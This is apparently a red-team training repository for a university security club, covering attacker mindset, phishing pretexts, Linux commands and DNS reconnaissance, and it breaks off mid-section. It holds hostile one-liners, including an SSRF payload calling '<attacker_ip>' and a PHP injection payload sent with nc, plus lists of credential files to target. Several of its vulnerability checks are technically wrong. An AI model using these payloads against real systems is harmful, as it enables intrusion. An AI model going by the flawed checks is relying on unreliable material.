├── LICENSE
├── README.md
└── Start
    ├── 0x1-Mindset
        ├── Objective.png
        └── README.md
    ├── 0x2-Environment
        ├── Gift
        │   ├── 1.png
        │   ├── 2.png
        │   ├── 3.png
        │   ├── echo
        │   └── grep
        └── README.md
    ├── 0x3-Tools
        ├── Exploitation
        │   └── README.md
        ├── InformationGathering
        │   ├── README.md
        │   └── server_socket.c
        ├── PasswordAttacks
        │   └── README.md
        ├── PrivilegeEscalation
        │   └── README.md
        ├── README.md
        ├── Reporting
        │   └── README.md
        ├── Tunneling
        │   └── README.md
        ├── VulnerableOrNot
        │   └── README.md
        └── WebAttacks
        │   └── README.md
    ├── 0x4-KillChain
        └── README.md
    └── README.md


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 #~smadi
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | <h1 align="center">
 2 |   <br>
 3 |   Welcome to Offensive Operations learning path!
 4 |   <a href="https://github.com/smadi0x86/CSC-RedOps"><img src="https://blog.cloudflare.com/content/images/2017/12/animation-iot-botnet.gif" alt="redteam.logo"></a>
 5 |   <br>
 6 | 
 7 |   <br>
 8 | </h1>
 9 | 
10 | <h3 align="center">No way back, Hunt Them Down!</h3>
11 | 
12 | <p align="center">
13 |   <a href="">
14 |    <img src=https://img.shields.io/badge/Red-Team-darkred>
15 |    <img src=https://img.shields.io/badge/Learning-Path-yellow>
16 |    <img src=https://img.shields.io/badge/License-MIT-blue>
17 |   <img src=https://img.shields.io/badge/CSC-HTU-red>
18 |   </a>
19 |   </p>
20 | 
21 | ## 🛑 Notice :
22 | ```
23 | This learning path is made for the offensive (red) team members of the Cyber Security Club in HTU.
24 | ```
25 | ## ⚠️ Disclaimer :
26 | ```
27 | I am not responsible for any misuse of this information, its only for education purposes.
28 | ```
29 | ## 📞 Contact :
30 | 
31 | <p align="center">
32 | <a href="https://linkedin.com/in/saud-smadi" target="blank"><img align="center" src="https://cdn.jsdelivr.net/npm/simple-icons@3.0.1/icons/linkedin.svg" alt="smadi" height="25" width="25" /></a>
33 | <a href="https://twitter.com/@smadi0x86" target="blank"><img align="center" src="https://cdn.jsdelivr.net/npm/simple-icons@7.5.0/icons/twitter.svg" alt="smadi" height="25" width="25" /></a>
34 | <a href="https://t.me/rootsmadi" target="blank"><img align="center" src="https://cdn.jsdelivr.net/npm/simple-icons@3.0.1/icons/telegram.svg" alt="smadi" height="25" width="25" /></a>
35 | <a href="https://smadi0x86-blog.gitbook.io/smadi0x86-blog/" target="blank"><img align="center" src="https://cdn.jsdelivr.net/npm/simple-icons@7.5.0/icons/gitbook.svg" alt="smadi" height="25" width="25" /></a>
36 | </p>
37 | 


--------------------------------------------------------------------------------
/Start/0x1-Mindset/Objective.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x1-Mindset/Objective.png


--------------------------------------------------------------------------------
/Start/0x1-Mindset/README.md:
--------------------------------------------------------------------------------
  1 | <h1 align="center">
  2 |   Adapting an attacker mindset
  3 |   <br>
  4 |   <a href="https://github.com/smadi0x86/CSC-RedOps"><img src="https://images.squarespace-cdn.com/content/v1/62a373ec42f8c73e67407b0f/e448a967-6950-476c-9dd6-0a0b9f0175ad/giphy+%2849%29.gif" alt="mindset.logo"></a>
  5 |   <br>
  6 | </h1>
  7 | 
  8 |  <h3 align="center">The attacker mindset is a set of cognitive skills applied to several laws.</h3>
  9 |  
 10 | <p align="center">
 11 |   <a href="">
 12 |    <img src=https://img.shields.io/badge/Red-Team-darkred>
 13 |    <img src=https://img.shields.io/badge/Attack-Mindset-blue>
 14 |   </a>
 15 |   </p>
 16 | 
 17 | ## Let's Begin
 18 | 
 19 | ```
 20 | There are two main states of attacker mindset: 
 21 | There’s before the vulnerable information has been carved out and there’s after.
 22 | 
 23 | One commonality exists between them: 
 24 | Every step you take as an attacker must go in the direction of the objective.
 25 | ```
 26 | 
 27 | ```
 28 | The main advantage of an attacker on other people is the skill and laws he follows to obtain his objective.
 29 | Things to remember:
 30 | ```
 31 | ```
 32 | There is no attack without information, as an example:
 33 | ```
 34 | - ***If you hear of a company holding a conference, you may be able to phish them by gathering information on who their vendors are, what their employees are doing and what their security is like.***
 35 | - ***You can then use this information to create a convincing phishing email that will be more likely to be opened.***
 36 | - ***If they are holding the event virtually, a well-crafted phish will have a high probability of being undetected.***
 37 | - ***You might start by finding out which platform they are holding the event on and phishing them, pretending to be that platform.***
 38 | - ***The possibilities are truly endless when you have information, and you can weaponize it and leverage it correctly.***
 39 | 
 40 | ## [The Laws](https://github.com/smadi0x86/CSC-RedOps/blob/main/Start/0x1-Mindset/Objective.png)
 41 | 
 42 | ```
 43 | These laws must all work together in order to obtain success.
 44 | It’s the application of the skills against the laws that makes the mindset:
 45 | ```
 46 | - ***Law 1 states that you start with the end in mind, knowing your objective. This will allow you to use laws 2, 3, and 4 most effectively.***
 47 | - ***Law 2 states that you gather, weaponize, and leverage information for the good of the objective, this is how you serve law 1.***
 48 | - ***Law 3 says that you never break pretext, You must remain disguised as a threat at all times.***
 49 | - ***Law 4 tells you that everything you do is for the benefit of the objective.***
 50 | 
 51 | ## Cognitive Skills
 52 | 
 53 | ```
 54 | All of this neatly brings us to the cognitive skills an attacker must exhibit:
 55 | ```
 56 | - ***An attacker must have curiosity & persistence to drive that curiosity into action so as to be moving forward all the time.***
 57 | - ***This mindset requires self-awareness.***
 58 | - ***Self-awareness is invisible. No one can “see” that you are self-aware, but almost everyone can feel if you are or not.***
 59 | - ***An attacker’s main ammo is the leveraging and weaponization of information, without this they are powerless.***
 60 | - ***Never forget that the world runs on data now, so information is everywhere, You just need to know how to find it and how to use it.***
 61 | ```
 62 | The objective is the central point from which all moves an attacker makes is dependent on it.
 63 | ```
 64 | 
 65 | ## [Application of mindset](https://www.coresecurity.com/blog/how-think-attacker-advice-not-so-dark-side)
 66 | 
 67 | ```
 68 | The application is the leveraging of that information to perform our attack, Let’s look at application from a high level.
 69 | There are many ways to attack:
 70 | ```
 71 | 
 72 | - ***Physical Attacks: An attack on a physical resource, such as a facility, building, or other physical asset.***
 73 | - ***Human Attack: An attack that involves social engineering and the manipulation of people to achieve the objective, also at a physical resource/facility, includes vishing (voice phishing).***
 74 | - ***Cyber Attacks: Cyberattacks can range from installing spyware or malware onto a computer or network to attempting to destroy the infrastructure.***
 75 | - ***Theoretical Attacks: Often used for strategy and decision making, It is typically performed by two opposing teams, generally outside the organization, that test the weight of the intelligence given to them, both arriving at different outcomes based on the same information.***
 76 | - ***Confidence in Your Character: This doesn’t mean to say you must act confident. If you are posing as a lost foreigner, then you shouldn’t really be too confident, but you should have confidence in your “character” or pretext choice.***
 77 | - ***Commitment to Your Character: This plan for me, includes if I get caught. 
 78 | I will keep in character for as long as I can until I am sure they will not let me go (obviously I would try again) or if
 79 | they threaten to call the authorities. If one or both of these occur, I explain the situation and ask for my point of contact to be reached.***
 80 | - ***Narrative Effect: As humans, we love stories. In reality, we don’t always see the truth. We rely on a biased set of cognitive processes to get to a conclusion or belief.***
 81 | - ***Preloading: Preloading is influencing your target before the event takes place. In other words, the attack starts before you’ve walked in the door
 82 | how you walk, how you carry yourself, what you are wearing, and your posture, facial expression, everything, are all factors in your success.***
 83 | - ***“Right Time, Right Place” Preload: Preloading can work by simply being in the right place at the right time. Imagine you are a target for a moment; you are at a work
 84 | event and someone approaches you, seemingly interested in you and your job. It doesn’t seem too threatening after all, it’s just someone interested in learning about your job.***
 85 | 
 86 | ## Things to remember
 87 | 
 88 | ```
 89 | These five things play a role in every job you will get as an ethical attacker looking to succeed.
 90 | ```
 91 | - ***You cannot become a good attacker without a healthy dose of curiosity.***
 92 | - ***Your curiosity will not pay off without persistence.***
 93 | - ***You will have nothing to persist in if you cannot take in information and leverage the most of it correctly.***
 94 | - ***You will need to have mental agility (seeing the big picture) to actively adapt information in the moment.***
 95 | - ***If you have all of these skills, you will still only succeed if you have a high level of self-awareness, because you must always know what you bring and how to leverage it.*** 
 96 | - ***Self-awareness will allow you a higher level of influence over someone else which helps in social engineering.***
 97 | - ***Reporting attacks are for most people the least fun part of the job but the most important part for the client.***
 98 | ```
 99 | Key Note:  War is 90 percent information, the rest is how you apply it to the objective.
100 | ```
101 | 


--------------------------------------------------------------------------------
/Start/0x2-Environment/Gift/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x2-Environment/Gift/1.png


--------------------------------------------------------------------------------
/Start/0x2-Environment/Gift/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x2-Environment/Gift/2.png


--------------------------------------------------------------------------------
/Start/0x2-Environment/Gift/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x2-Environment/Gift/3.png


--------------------------------------------------------------------------------
/Start/0x2-Environment/Gift/echo:
--------------------------------------------------------------------------------
 1 | Here are some examples of using the echo command for pentesting:
 2 | 
 3 | 1. Testing if a server is vulnerable to Heartbleed SSL vulnerability:
 4 | 
 5 | echo -e "HELO \nQUIT" | openssl s_client -connect <target_host>:<target_port> -tlsextdebug 2>&1 | grep 'server extension "heartbeat" (id=15)'
 6 | 
 7 | This command sends a specially crafted message to the server and checks if it responds with the "heartbeat" server extension, indicating that it is vulnerable to the Heartbleed SSL vulnerability.
 8 | 
 9 | 2. Checking if a target is vulnerable to Shellshock:
10 | 
11 | echo "() { :; }; echo vulnerable" | bash -c "echo this is a test"
12 | 
13 | This command sends a specially crafted environment variable to the target's Bash shell and checks if it responds with the word "vulnerable", indicating that it is vulnerable to the Shellshock vulnerability.
14 | 
15 | 3. Testing if a target is vulnerable to PHP Object Injection:
16 | 
17 | echo '<?php class Test { public $cmd = "ls -la"; function __destruct() { system($this->cmd); } } $t = new Test; unserialize(serialize($t)); ?>' > payload.txt
18 | cat payload.txt | nc -nv <target_host> <target_port>
19 | 
20 | This command sends a specially crafted serialized PHP object to the target and checks if it executes the command "ls -la", indicating that it is vulnerable to PHP Object Injection.
21 | 
22 | 4. Checking if a target is vulnerable to SQL injection:
23 | 
24 | echo "SELECT * FROM users WHERE id=1 OR 1=1; --" | mysql -h <target_host> -u <username> -p<password> <database_name>
25 | 
26 | This command sends a SQL query to the target's MySQL database and checks if it returns all records from the "users" table, indicating that it is vulnerable to SQL injection.
27 | 
28 | 5. Testing if a target is vulnerable to Server-Side Request Forgery (SSRF):
29 | 
30 | echo "<?php echo file_get_contents('http://<attacker_ip>/secret_file.txt'); ?>" > payload.php
31 | curl -X POST -d "@payload.php" <target_url>
32 | 
33 | This command sends a PHP payload to the target's server and checks if it sends a request to the attacker's server to retrieve a secret file, indicating that it is vulnerable to SSRF.
34 | 


--------------------------------------------------------------------------------
/Start/0x2-Environment/Gift/grep:
--------------------------------------------------------------------------------
 1 | 10 examples of how you can use "grep" command:
 2 | 
 3 | 1. Finding sensitive information in a file:
 4 | 
 5 | grep -i "password" file.txt
 6 | 
 7 | This will search for the word "password" in the file.txt and print any lines that contain it.
 8 | 
 9 | 2. Finding a specific string in a directory:
10 | 
11 | grep -r "string" /path/to/directory/
12 | 
13 | This will search for the string "string" in all files under the /path/to/directory/ and print any lines that contain it.
14 | 
15 | 3. Searching for a pattern in a log file:
16 | 
17 | grep "error" /var/log/syslog
18 | 
19 | This will search for the word "error" in the syslog file and print any lines that contain it.
20 | 
21 | 4. Finding open ports in a network:
22 | 
23 | nmap 192.168.0.1-255 | grep open
24 | 
25 | This will scan the network 192.168.0.1 to 192.168.0.255 for open ports and print the open ports using grep.
26 | 
27 | 5. Searching for vulnerable software versions:
28 | 
29 | cat /etc/issue | grep -E "Ubuntu|Debian|CentOS|Red Hat"
30 | 
31 | This will search for the operating system name in the issue file and print it using grep.
32 | 
33 | 6. Searching for sensitive information in a web page:
34 | 
35 | curl -sL https://example.com | grep "password"
36 | 
37 | This will search for the word "password" in the web page of example.com and print any lines that contain it.
38 | 
39 | 7. Finding all files containing a certain string:
40 | 
41 | grep -l "string" /path/to/directory/*
42 | 
43 | This will search for the string "string" in all files under the /path/to/directory/ and print the names of files that contain it.
44 | 
45 | 8. Finding all IP addresses in a file:
46 | 
47 | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" file.txt
48 | 
49 | This will search for IP addresses in the file.txt and print them using grep.
50 | 
51 | 9. Searching for a pattern in a compressed file:
52 | 
53 | zgrep "error" /var/log/syslog.1.gz
54 | 
55 | This will search for the word "error" in the compressed file syslog.1.gz and print any lines that contain it.
56 | 
57 | 10. Searching for a pattern in a process list:
58 | 
59 | ps aux | grep "process_name"
60 | 
61 | This will search for the process name "process_name" in the process list and print any lines that contain it.
62 | 


--------------------------------------------------------------------------------
/Start/0x2-Environment/README.md:
--------------------------------------------------------------------------------
  1 | <h1 align="center">
  2 |   Control your environment
  3 |   <br>
  4 |   <a href="https://github.com/smadi0x86/CSC-RedOps"><img src="https://i.pinimg.com/originals/2f/35/42/2f35421b4bdaead24c9b8d1f7f228038.gif" alt="linux.logo"></a>
  5 |   <br>
  6 |   </h1>
  7 |  
  8 |  <h3 align="center">Your environment is any linux distribution you will be using in offensive operations</h3>
  9 |  
 10 | <p align="center">
 11 |   <a href="">
 12 |    <img src=https://img.shields.io/badge/Red-Team-darkred>
 13 |    <img src=https://img.shields.io/badge/Environment-Control-blue>
 14 |   </a>
 15 |   </p>
 16 |   
 17 | ## Pick your distribution
 18 | ```
 19 | Picking your linux distro is essential to ensure that you're comfortable and doing your attacks with full efficiency.
 20 | ```
 21 | ```
 22 | There are many distros you can pick from, some popular ones are:
 23 | ```
 24 | - [***Kali Linux***](https://www.kali.org/get-kali/)
 25 | - [***ParrotOS***](https://www.parrotsec.org/download/)
 26 | - [***BlackArch***](https://blackarch.org/downloads.html)
 27 | 
 28 | ```
 29 | We will not go over installing them, but here are videos that explains that:
 30 | ```
 31 | - [***Installing Kali***](https://www.youtube.com/watch?v=3Iq7wHsNEXw)
 32 | - [***Installing Parrot***](https://www.youtube.com/watch?v=9z-_h7aChDI)
 33 | - [***Installing BlackArch***](https://www.youtube.com/watch?v=T0MBlWLZvpE)
 34 | 
 35 | ```
 36 | I will be explaining terminal commands that is handy for offensive ops, meanwhile I'm assuming you know basics of terminal usage such as: cd, cat, grep, chmod etc...
 37 | ```
 38 | ```
 39 | Note: These commands are tested on Parrot and Kali, BlackArch terminal is slightly different, it uses pacman instead of apt for package managing for example.
 40 | ```
 41 | ## Fire up your terminal
 42 | ```
 43 | Let's start exploring more commands & utilities
 44 | ```
 45 | ### 1) Comparing Files:
 46 | ```
 47 | Comparing files may seem irrelevant, but its so useful specially when you do multiple scans for same target and wanna check if there's duplication of results.
 48 | ```
 49 | - ***The "comm" command displays comparison between two text files the 1st line is unique to scan-a & 2nd line is unique to scan-b & third is the same in both files:***
 50 | ```bash
 51 | $~ comm scan-a.txt scan-b.txt
 52 | ```
 53 | 
 54 | ### 2) Managing Processes:
 55 | ```
 56 | Linux manages multi tasks using processes + every process has a unique id, the terminal introduces jobs which suspend execution of processes or resume execution for later time.
 57 | ```
 58 | - ***a) "bg"***
 59 | - ***Using an "&" at the end of a command to send it to background, we will send a 500 icmp echo request to ourselves and save it to a file then background it.***
 60 | - ***If we remove the "&" and run it again it will run in foreground and you can quit it by pressing CTRL+c or suspend it with CTRL+z.***
 61 | - ***If suspended we can return it with "bg" command***
 62 | ```bash
 63 | $~ ping -c 500 localhost > ping_icmp.txt &
 64 | ```
 65 | 
 66 | - ***b) "jobs" and "fg"***
 67 | 
 68 | - ***To check the status of our previous icmp echo request we need to use "jobs" and "fg"***
 69 | - ***This will list all jobs status that are running, suspended or stopped.***
 70 | ```bash
 71 | $~ jobs
 72 | ```
 73 | - ***This will return the process to foreground and you can edit or execute it again, %1 is just an example you can put any process number that you have 1,2,3,4 etc...***
 74 | ```bash
 75 | $~ fg %1
 76 | ```
 77 | 
 78 | - ***c) "ps" and "kill"***
 79 | - ***Unlike jobs command, ps lists all system processes not only for terminal session, It is useful after compromise to check software running on victim machine.***
 80 | - ***This gives more information and clues for further access.***
 81 | - ***This shows all processes, e: select all processes f: full format.***
 82 | ```bash
 83 | $~ ps -ef
 84 | ```
 85 | - ***This looks for the specific process name you give to it, such as notepad, firefox etc...***
 86 | ```bash
 87 | $~ ps -fC notepad
 88 | ```
 89 | - ***To terminate/kill any process, the pid is the process id for example: 1805, 950 etc... which is shown for every process when running the "ps -ef" command.***
 90 | ```bash
 91 | $~ kill 1805
 92 | ```
 93 | 
 94 | ### 3) Downloading Files
 95 | ```
 96 | Downloading Files is the most powerful commands used, most malware authors use these commands to perform different techniques for delivering and execution of their malware on the target system.
 97 | ```
 98 | - ***"wget"***
 99 | - ***This command can be used to download http and ftp protocols, it can be used with -O flag to save to a file with different name on the local machine.***
100 | ```bash
101 | $~ wget -O wget_example.md https://https://github.com/smadi0x86/CSC-RedOps/edit/main/Start/0x2-Environment/README.md
102 | ```
103 | - ***curl***
104 | - ***To download or upload files and build complex requests, similar to wget you can use -o to save to a file with different name on local machine.***
105 | ```bash
106 | $~ curl -o curl_example.md https://https://github.com/smadi0x86/CSC-RedOps/edit/main/Start/0x2-Environment/README.md
107 | ```
108 | - ***axel***
109 | - ***It's a download accelerator that transfer a file from http or ftp server through multiple connections, -n specifies the number of multiple connections used, -a: more concise progress indicator and -o for a different file name save on local machine.***
110 | ```bash
111 | $~ axel -a -n 10 -o axel_example.md https://https://github.com/smadi0x86/CSC-RedOps/edit/main/Start/0x2-Environment/README.md
112 | ```
113 | 
114 | ### 4) Environment Variables
115 | ```
116 | When opening a terminal window, a new bash process that has its own environment variables is initialized, these variables are form of global storage for various setting inherited by any applications that run during this terminal session, one of most common referenced environment variables are:
117 | ```
118 | ```bash
119 | $~ echo $PATH
120 | $~ echo $USER
121 | $~ echo $PWD
122 | $~ echo $HOME
123 | ```
124 | - ***We can assign our own env variables, for example if we want to scan a target and don't want to type his IP several times we can do:***
125 | - ***Then call this variable with a "$" as shown below.***
126 | - ***If you define the variable without the "export" command you can use it in other terminal instances, its not tied only to the same terminal.***
127 | - ***You can type "env" command in your terminal to view all environment variables.***
128 | ```bash
129 | $~ export IP=192.168.1.1
130 | $~ ping $IP
131 | $~ var="Without export command"
132 | $~ echo $var
133 | $~ env
134 | ```
135 | 
136 | ### 5) Systemctl
137 | ```
138 | The systemctl command manages both system and service configurations, enabling you to manage the OS and control the status of services.
139 | ```
140 | - ***Common systemctl commands***
141 | - ***The enable command is to launch a daemon background service that is launched with system boot, to keep a service running when restarting the system.***
142 | - ***Starting and Stopping Services, I'll take ftp as a service example:***
143 | ```bash
144 | $~ sudo systemctl start ftp
145 | $~ sudo systemctl stop ftp
146 | $~ sudo systemctl restart ftp
147 | $~ sudo systemctl enable ftp
148 | $~ $~ sudo systemctl disable ftp
149 | $~ sudo systemctl status ftp
150 | ```
151 | 
152 | ### 6) Bonus: Files to look for
153 | ```
154 | Here are some common files you need to watch for in your attack and this is just a short list off the top of my head:
155 | ```
156 | - ***.rhosts (allows remote logins)***
157 | - ***/etc/passwd (contains the user names)***
158 | - ***/etc/shadow (contains the hashed passwords)***
159 | - ***inittab (initialization sequence)***
160 | - ***crontab files (scheduler)***
161 | - ***inetd files (which can be used to start other network daemons)***
162 | - ***/etc/init.d (all the startup scripts)***
163 | - ***/var/log/wtmp (login log files)***
164 | - ***/tmp***
165 | 
166 | ### [Check More Commands Here](https://securityonline.info/some-useful-linux-command-for-your-penetration-testinglinux-command/) + use the --help on every command to check additional functionalities, for example curl --help.
167 | 


--------------------------------------------------------------------------------
/Start/0x3-Tools/Exploitation/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x3-Tools/Exploitation/README.md


--------------------------------------------------------------------------------
/Start/0x3-Tools/InformationGathering/README.md:
--------------------------------------------------------------------------------
  1 | # Passive Information Gathering
  2 | ```
  3 | Also known as Open Source Intelligence, the goal is to optain information that expands the attack surface either by phishing or password attacks etc...
  4 | We never communicate with the target directly, we can rely on third parties for information.
  5 | We can only interact as a normal user but never scan or access the vulnerablities of target system or server in this phase.
  6 | 
  7 | Note: If any tool mentioned gives you not found run: sudo apt install <toolname> and use the <toolname> --help for extra functionalities of every tool
  8 | ```
  9 | 
 10 | ## Website Recon
 11 | ```
 12 | This is fairly simple, just visit the target website and look for:
 13 | ```
 14 | - ***About Page: This reveals the employees emails which start commonly with their lastname@target.com, but the CEO would use his firstname@target.com.***
 15 | ***We could use these emails in a social media information gathering campaign which is helpful.***
 16 | 
 17 | ### whois
 18 | ```
 19 | whois is a TCP service, tool and database which provides information about a domain name such as the nameserver.
 20 | ```
 21 | 
 22 | ***This can be used in terminal or on the [whois website](https://www.whois.com/)***
 23 | ***I'll take megcorpone.com as an example:***
 24 | 
 25 | ```bash
 26 | $~ whois www.megacorpone.com
 27 | ```
 28 | 
 29 | ***Not all information can be useful, but we can see who registered the domain which is Alan Grofield.***
 30 | 
 31 | ![image](https://user-images.githubusercontent.com/75253629/227772437-852a38d0-8101-4efa-814b-69f83d576065.png)
 32 | 
 33 | ```
 34 | If we visit the megacorpone.com we can see that Alan Grofield is an IT and security director.
 35 | ```
 36 | 
 37 | <img src=https://user-images.githubusercontent.com/75253629/227772554-d4e2bdab-17ad-4503-8b5e-c81d8d25352d.png>
 38 | 
 39 | ```
 40 | Also we can see the nameservers which are components of DNS, we won't get into them right now but its worth keeping it in our notes.
 41 | ```
 42 | 
 43 | ![image](https://user-images.githubusercontent.com/75253629/227772792-fd7b91e1-e904-4492-ad30-2fdf2c140e36.png)
 44 | 
 45 | ```
 46 | Note: you can do a reverse-lookup with whois but instead of writing megacorpone.com you can ping it and get its IP then run whois <IP> in terminal.
 47 | Reverse lookups gives more information regarding subdomains of the website and extra information that the normal lookup won't give.
 48 | ```
 49 | 
 50 | <img src=https://user-images.githubusercontent.com/75253629/227772978-fc52de6e-6551-4d3d-ac36-5f8b54e38ab5.png>
 51 | 
 52 | ### Recon-NG
 53 | ```
 54 | Recon-NG is a Module-based framework for web-based information gathering and it can be used in terminal.
 55 | ```
 56 | - ***To get started let's open open our terminal and run:***
 57 | ```bash
 58 | $~ recon-ng
 59 | ```
 60 | - ***If you don't have it pre-installed you can run:***
 61 | ```bash
 62 | $~ sudo apt-get install recon-ng
 63 | ```
 64 | ![image](https://user-images.githubusercontent.com/75253629/229310421-83e4cd59-b6e3-4d77-9621-eea93511ff40.png)
 65 | 
 66 | ```
 67 | Let's start by searching for a module ( It will be a github module as an example):
 68 | [recon-ng][default] > marketplace search github
 69 | ```
 70 | ![image](https://user-images.githubusercontent.com/75253629/229310486-488e0dfa-713f-44cc-823c-e4b0eb4de816.png)
 71 | 
 72 | - ***Here we can take a look at all github modules available.***
 73 | - ***The K row is all the modules that require registration to access the API of it and they are marked with a "*"***
 74 | - ***You can use the keys to access key-required modules from [here](https://github.com/lanmaster53/recon-ng-marketplace/wiki/API-keys), there are paid and free keys to use.***
 75 | ```
 76 | We can get information about a module using:
 77 | [recon-ng][default] > marketplace info <module>
 78 | ```
 79 | ![image](https://user-images.githubusercontent.com/75253629/229310793-49d0c9de-e13e-45c0-8c13-3a9e203599be.png)
 80 | 
 81 | - ***According to info this module doesn't require API key and its used to harvest hosts from google.***
 82 | 
 83 | ```
 84 | Let's install this module by:
 85 | [recon-ng][default] > marketplace install recon/domains-hosts/google_site_web
 86 | 
 87 | Then we use it by:
 88 | [recon-ng][default] > modules load recon/domains-hosts/google_site_web
 89 | 
 90 | Let's then use info to see how to use this module:
 91 | ```
 92 | ![image](https://user-images.githubusercontent.com/75253629/229311062-0014fd49-d97f-4617-aa1c-14f48638fb0a.png)
 93 | 
 94 | - ***Seems they are asking for a source which is megacorpone.com for this example:***
 95 | ```
 96 | [recon-ng][default][google_site_web] > options set SOURCE megacorpone.com
 97 | [recon-ng][default][google_site_web] > run
 98 | ```
 99 | ![image](https://user-images.githubusercontent.com/75253629/229311252-b3cfbc67-4f6b-47b7-a7be-8ee2259fe391.png)
100 | 
101 | - ***When the module is finished we can run:***
102 | ```
103 | [recon-ng][default][google_site_web] > back
104 | [recon-ng][default] > show hosts
105 | ```
106 | ![image](https://user-images.githubusercontent.com/75253629/229311356-d5101785-1bc0-4091-a120-6ca1bacaf291.png)
107 | 
108 | ```
109 | But now we have a problem, we don't have that much information of the target, thats why we use different module to resolve the IP of this host such as:
110 | > recon/hosts-hosts/resolve
111 | 
112 | Let's download and use it ( the same steps as the first module we installed):
113 | ```
114 | ![image](https://user-images.githubusercontent.com/75253629/229311552-af52fb0a-05de-4d95-ad66-60d13f7d07aa.png)
115 | 
116 | ```
117 | Now we just run the module because we already got the source host so this module already knows what we are looking for.
118 | ```
119 | ![image](https://user-images.githubusercontent.com/75253629/229311660-0c88dd64-b966-4aa3-8292-e6fdd3d902ef.png)
120 | 
121 | 
122 | ```
123 | There are many OSINT tools available, I won't be covering all of them but here's some to keep an eye on:
124 | ```
125 | - ***[Osintframework](https://osintframework.com/)***
126 | - ***[NetCraft](https://www.netcraft.com/)***
127 | - ***[Maltego](https://www.maltego.com/)***
128 | - ***[Shodan](https://www.shodan.io/)***
129 | - ***[Osint.sh](https://osint.sh/)***
130 | 
131 | # Active Information Gathering
132 | 
133 | ```
134 | This involves direct interaction with target to collect information.
135 | This will include port scanning, DNS, SMB, SMTP enumerations.
136 | ```
137 | ## DNS Enumeration
138 | ```
139 | DNS is the naming system of the internet, it translates user-friendly website names to IP addresses.
140 | ```
141 | ![image](https://user-images.githubusercontent.com/75253629/229312038-ac65789c-f643-455a-86f6-d370028c89ed.png)
142 | 
143 | ### Interacting with a DNS server
144 | 
145 | - ***We can use the "host" command to view the DNS server of a host:***
146 | 
147 | ```
148 | $~ host <website.com>
149 | ```
150 | ![image](https://user-images.githubusercontent.com/75253629/229312456-74f02f7d-5e25-4a46-8b2f-ee80adb0361c.png)
151 | 
152 | - ***Or to view additional information of the DNS server such as: mx which is servers that handles emails for the domain or txt records, using the -t argument:***
153 | ```
154 | $~ host -t mx <website.com>
155 | $~ host -t txt <website.com>
156 | ```
157 | ![image](https://user-images.githubusercontent.com/75253629/229312541-d8ca531f-c7e2-4dc4-9923-f00a2c7267a3.png)
158 | 
159 | ### Automating DNS Lookups
160 | 
161 | ```
162 | We will attempy to guess DNS host names by using a wordlist that uses common hostnames with a bash one liner on terminal:
163 | ```
164 | ```bash
165 | $~ for ip in $(cat wordlist.txt); do host $ip.megacorpone.com; done | grep -v "not found"
166 | ```
167 | - ***You can create your own custom wordlist that has several common hostnames such as: mail, owa, ftp, router etc... every word is seperated by a new line in a file.***
168 | - ***"grep -v "not found" is to filter out invalid results (doesn't show any results that has not found in it).***
169 | - ***Or you can download pre-made wordlists by:***
170 | ```bash
171 | $~ sudo apt install seclists
172 | ```
173 | 
174 | ### DNS Zone Transfers
175 | ```
176 | It is a database replication between related DNS servers in which a zone file is copied from a master DNS server to a slave server.
177 | The zone file contains a list of all the DNS names configured for that zone.
178 | Zone transfers must only be allowed for authorized slave DNS servers, but misconfiguration can lead to unauthorized transfer.
179 | ```
180 | - ***We can run a zone transfer with the "host -l" command followed by the "domain" and "DNS nameserver".***
181 | - ***Firstly lets get the nameserver:***
182 | ```bash
183 | $~ host -t ns htu.edu.jo 
184 | ```
185 | - ***Then we run the zone transfer command:***
186 | ```bash
187 | $~ host -l htu.edu.jo ns1.nitc.gov.jo
188 | ```
189 | ![image](https://user-images.githubusercontent.com/75253629/229322720-442d37a6-b4b2-4b7e-924f-732328d494d4.png)
190 | 
191 | - ***The first nameserver doesn't allow zone transfers which is unlucky, maybe try the second nameserver (ns2) of megacorone.com and check what happens.***
192 | 
193 | ### DNS Tools
194 | ```
195 | There are several tools to automate the enumeration of DNS some are:
196 | ```
197 | ```
198 | DNSRecon: It is an advanced DNS enumeration script.
199 | ```
200 | - ***Lets try automating the zone transfer with DNSRecon:***
201 | ```bash
202 | $~ dnsrecon -d htu.edu.jo -t axfr
203 | ```
204 | - ***-d option: Specify a domain name.***
205 | - ***-t option: Specify the type of enumeration which is zone transfer (axfr).***
206 | 
207 | ![image](https://user-images.githubusercontent.com/75253629/229322912-a5ba8066-215a-422c-8dc2-bb8f39c47b3c.png)
208 | 
209 | ```
